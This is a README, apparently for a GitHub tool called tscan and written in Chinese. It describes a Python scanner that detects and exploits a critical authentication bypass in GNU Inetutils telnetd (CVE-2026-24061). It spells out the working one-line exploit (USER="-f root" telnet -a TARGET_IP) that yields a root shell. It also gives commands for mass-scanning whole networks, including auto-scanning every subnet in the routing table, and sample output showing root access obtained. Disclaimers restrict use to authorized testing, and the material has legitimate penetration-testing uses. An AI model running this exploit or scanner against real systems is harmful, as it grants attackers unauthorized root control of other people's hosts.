cumakurt/tscan

GitHub: cumakurt/tscan

针对 GNU Inetutils telnetd CVE-2026-24061 认证绕过漏洞的 Python 扫描器,可批量检测存在漏洞的服务并验证 root 权限获取能力。

Stars: 0 | Forks: 0

# Telnetd Auth Bypass 扫描器 (CVE-2026-24061) 一个基于 Python 的扫描器,用于检测和利用 GNU Inetutils telnetd 服务中的 CVE-2026-24061 漏洞。该工具扫描 IP 地址或网络,查找存在漏洞的 telnetd 服务,这些服务允许绕过认证从而获取 root shell 访问权限。 ## ⚠️ 重要法律声明和免责声明 **本软件仅供教育和授权安全测试目的使用。** ### 1. 教育目的 本应用程序**仅出于教育目的**而开发,旨在演示安全漏洞并协助进行授权的安全测试和研究。 ### 2. 无担保 **本软件“按原样”提供,不提供任何形式的明示或暗示担保**,包括但不限于适销性、特定用途适用性和非侵权性的担保。**作者和贡献者不保证本软件无错误、安全或可用。** 本软件可能包含错误、缺陷或其他问题。 ### 3. 用户责任 **使用本软件的所有责任和风险完全由用户承担。** 本软件的作者、贡献者和分发者不对因使用、滥用或无法使用本软件而导致的任何损害、损失或法律后果承担责任。 ### 4. 禁止未经授权的使用 此工具**只能用于您拥有或获得明确书面授权进行测试的系统。** 未经授权访问计算机系统是非法的,可能导致刑事起诉。 ### 5. 不做保证 作者**不**保证: - 扫描结果的准确性 - 应用程序本身的安全性 - 与所有系统的兼容性 - 无错误或缺陷 - 任何特定功能或性能 **使用本软件即表示您确认已阅读、理解并同意受这些条款约束。如果您不同意,请勿使用本软件。** ## 开发者 **开发者:** Cuma KURT **Email:** cumakurt@gmail.com **LinkedIn:** https://www.linkedin.com/in/cuma-kurt-34414917/ ## 漏洞信息 **CVE-2026-24061**: GNU Inetutils telnetd(截至 2.7 版本)允许通过为 USER 环境变量设置 `-f root` 值来远程绕过认证。 **CVSS 评分**: 9.8 (严重) **参考**: [NVD CVE-2026-24061](https://nvd.nist.gov/vuln/detail/CVE-2026-24061) ## 功能 - 🔍 **端口扫描**: 检测开放的 telnet 端口(默认: 23,可自定义) - 🎯 **漏洞检测**: 测试是否存在 CVE-2026-24061 漏洞利用条件 - ⚡ **多线程**: 支持配置线程数的快速并发扫描 - 📁 **灵活输入**: 支持 IP 地址、CIDR 网络和基于文件的目标列表 - 🗺️ **自动检测**: 自动从路由表检测并扫描子网 - 🛑 **安全中断**: Ctrl+C 安全停止扫描并显示部分结果 - 📊 **实时进度**: 带有统计信息和发现结果的进度条 ## 安装 ### 前置条件 - Python 3.6 或更高版本 - `telnet` 客户端(通常预装在 Linux/macOS 上) ### 安装依赖 ``` pip3 install -r requirements.txt ``` **注意**: 大多数依赖项属于 Python 标准库。该工具在 Python 3.6+ 下即可开箱即用。 ## 使用 ### 基本用法 ``` # 扫描单个 IP 地址 python3 tscan.py 192.168.1.1 # 扫描 CIDR 网络 python3 tscan.py 192.168.1.0/24 # 使用自定义端口扫描 python3 tscan.py -p 2323 192.168.1.1 # 从文件扫描目标 python3 tscan.py targets.txt # 扫描多个 IP 地址 python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1 # 扫描多个 CIDR 网络 python3 tscan.py 192.168.1.0/24 10.0.0.0/16 ``` ### 性能调优 ``` # 增加线程数以加快扫描速度 (100 线程) python3 tscan.py -t 100 192.168.1.0/24 # 为慢速网络增加超时时间 python3 tscan.py --timeout 10 192.168.1.0/24 # 结合使用以进行大型网络扫描 python3 tscan.py -t 200 --timeout 8 10.0.0.0/16 ``` ### 自动检测模式 ``` # 自动检测并扫描系统路由表中的所有子网 python3 tscan.py --auto # 或使用简写形式: python3 tscan.py -a # 使用自定义端口自动检测 python3 tscan.py --auto -p 2323 # 或: python3 tscan.py -a -p 2323 # 使用高线程数自动检测 python3 tscan.py --auto -t 200 # 或: python3 tscan.py -a -t 200 ``` **注意**: `--auto` 模式使用 `ip route list` 或 `route -n` 命令读取系统路由表,并自动扫描所有检测到的子网。 ### 实战示例 ``` # 示例 1:快速扫描本地网络 python3 tscan.py 192.168.1.0/24 # 示例 2:高并发快速扫描 python3 tscan.py -t 300 --timeout 3 10.0.0.0/16 # 示例 3:扫描非标准 telnet 端口 python3 tscan.py -p 2323 192.168.1.0/24 # 示例 4:自动检测并扫描所有本地网络子网 python3 tscan.py --auto # 或: python3 tscan.py -a # 示例 5:使用自定义设置自动检测 python3 tscan.py --auto -p 2323 -t 100 --timeout 8 # 或: python3 tscan.py -a -p 2323 -t 100 --timeout 8 ``` ### 命令行选项 ``` positional arguments: targets IP address(es), CIDR network(s), or file path(s) containing targets options: -h, --help show this help message and exit -p, --port PORT Telnet port to scan (default: 23) -t, --threads THREADS Number of concurrent threads (default: 50) --timeout TIMEOUT Connection timeout in seconds (default: 5) -v, --verbose Verbose output -a, --auto Automatically detect and scan all subnets from system routing table (route -n or ip route list) ``` ## 输入文件格式 创建一个文本文件,每行一个目标: ``` 192.168.1.1 192.168.1.0/24 10.0.0.1 172.16.0.0/16 ``` 以 `#` 开头的行被视为注释并被忽略。 ## 输出 该工具提供: 1. **实时进度**: 在发现结果时显示 - 带有百分比和统计信息的进度条 - 进度条中显示易受攻击主机数量 - `[!]` - 易受攻击主机 - `[~]` - 端口开放但不易受攻击 - 端口关闭的目标会被静默跳过 - **Ctrl+C (KeyboardInterrupt)**: 安全中断扫描并立即显示部分结果 2. **摘要报告**: 包括: - 发现的 telnet 服务总数 - 易受攻击主机数量 - 易受攻击主机的详细列表 ### 示例输出 #### 基本扫描输出 ``` [*] Starting scan on 256 target(s)... [*] Port: 23, Threads: 50, Timeout: 5s [*] Progress: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Open: 2 | Vulnerable: 1 [!] 192.168.1.100:23 - VULNERABLE [*] Progress: [████████████████████████████████████] 100.0% (256/256) | Open: 3 | Vulnerable: 1 [+] Scan completed: 256/256 targets scanned ====================================================================== Scan Results Summary ====================================================================== Telnet services found: 3 Vulnerable hosts: 1 [!] VULNERABLE HOSTS: ● 192.168.1.100:23 Output: uid=0(root) gid=0(root) groups=0(root)... [~] Telnet services found but not vulnerable: ● 192.168.1.101:23 ● 192.168.1.102:23 [*] Scan completed in 12.34 seconds ``` ## 工作原理 1. **端口检测**: 检查目标 IP 上的 telnet 端口是否开放 2. **漏洞利用尝试**: 对于开放端口,尝试 CVE-2026-24061 漏洞利用: - 设置 `USER="-f root"` 环境变量 - 通过 `telnet -a` 命令连接 - 发送测试命令以验证 root shell 访问权限 3. **结果分类**: 将结果分类为易受攻击或不易受攻击 ## 漏洞利用详情 该漏洞允许通过将 `USER` 环境变量设置为 `-f root` 来绕过认证: ``` USER="-f root" telnet -a TARGET_IP [PORT] ``` 这导致 telnetd 将 USER 变量解释为一个标志,从而绕过认证并授予 root 访问权限。 ## 限制 - 需要安装 `telnet` 客户端 - 仅对存在漏洞的 telnetd 版本(≤ 2.7)有效 - 自动检测模式需要 `ip route list` 或 `route -n` 命令 ## 故障排除 ### "telnet 命令未找到" 安装 telnet 客户端: ``` # Debian/Ubuntu sudo apt-get install telnet # CentOS/RHEL sudo yum install telnet # macOS # 通常已预装 ``` ### 未找到结果 - 验证目标是否可达 - 检查防火墙规则 - 确保 telnet 服务确实在运行 - 尝试增加超时时间: `--timeout 10` ## 法律和道德使用 本工具旨在用于: - ✅ 授权渗透测试 - ✅ 对您自己系统的安全研究 - ✅ 经适当授权的漏洞评估 - ✅ 受控环境中的教育目的 **请勿将此工具用于:** - ❌ 未经授权的系统访问 - ❌ 非法黑客活动 - ❌ 任何未经明确许可的活动 ## 参考 - [CVE-2026-24061 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-24061) - [SafeBreach Labs 分析](https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/) ## 许可证 本程序是自由软件:您可以根据 自由软件基金会发布的 GNU 通用公共许可证(GPL)条款(第 3 版或 (您选择的)任何更高版本)重新分发和/或修改它。 分发本程序是希望它有用, 但不提供任何担保, 甚至不包括适销性或特定用途适用性的暗示担保。 有关更多详细信息,请参阅 GNU 通用公共许可证。 您应该已经随本程序收到了 GNU 通用公共许可证的副本。 如果没有,请参阅 。 ### 完整许可证文本 有关完整的 GNU 通用公共许可证 v3.0 文本,请参阅 [LICENSE](LICENSE) 文件。 ## 免责声明 **作者和贡献者不对因使用本工具而造成的任何误用或损害负责。** 本工具**仅供教育和授权安全测试目的使用**。 **使用风险自负。** 使用本软件的所有责任和风险完全由用户承担。作者不保证本软件的准确性、安全性或功能性。本软件“按原样”提供,不提供任何形式的担保。 **本应用程序仅出于教育目的而开发。** 使用本软件即表示您确认: - 您理解这是一个教育工具 - 使用它的所有责任由您承担 - 作者不提供任何保证或担保 - 您将仅在自己拥有或获得明确书面授权测试的系统上使用它 - 未经授权的使用是非法的,可能导致刑事起诉 如果您不同意这些条款,**请勿使用本软件**。
标签:CVE-2026-24061, GNU Inetutils, PE 加载器, PoC, Python, Root Shell, Telnet, 免杀, 加密, 提权, 攻击路径可视化, 数据统计, 无后门, 暴力破解, 漏洞扫描器, 端口扫描, 编程工具, 网络安全, 认证绕过, 远程代码执行, 逆向工具, 隐私保护, 黑客工具